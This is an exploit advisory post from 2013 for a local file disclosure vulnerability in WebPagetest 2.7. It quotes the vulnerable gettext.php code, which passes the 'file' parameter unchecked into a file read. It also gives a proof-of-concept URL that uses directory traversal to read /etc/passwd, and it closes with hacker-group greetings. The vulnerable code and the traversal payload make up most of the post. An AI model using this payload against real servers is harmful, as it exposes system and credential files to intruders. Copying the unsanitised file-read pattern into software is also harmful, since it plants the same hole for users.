facebook facebook twitter rss

WebPagetest 2.7 LFD Vulnerability

Author: TUNISIAN CYBER , Published: 24-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: WebPagetest 2.7 LFD Vulnerability
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://code.google.com/p/webpagetest/downloads/detail?name=webpagetest_2.7.zip&can=2&q=
[+] Google Dork: n/a
[+] Tested on: KaliLinux/Debian 3.7.2
[+] Friend's blog: http://na3il.com/

########################################################################################
v2.6 Discovered by dun (http://1337day.com/exploit/18980)

+Description:

WebPagetest is an open source project that is primarily being developed and supported by Google
as part of our efforts to make the web faster.

+Exploit:
WebPagetestfrom a LFD Vulnerablitiy:

1/LFD:

File: gettext.php
Parameter: file

[PHP]
<?php
include('common.inc');
$ok false;

if( isset(
$_GET['file']) && strlen($_GET['file']) )
{
    
$data gz_file_get_contents("$testPath/{$_GET['file']}");
    if( 
$data !== false )
    {
        
$ok true;
        echo 
$data;
    }
}

if( !
$ok )
    
header("HTTP/1.0 404 Not Found"); 
?>

[PHP]

P.O.C
127.0.0.1/webP/www/gettext.php?file=../../../../../../../../../../../etc/passwd
LocalTest: http://i.imgur.com/9MFuGDf.png


########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :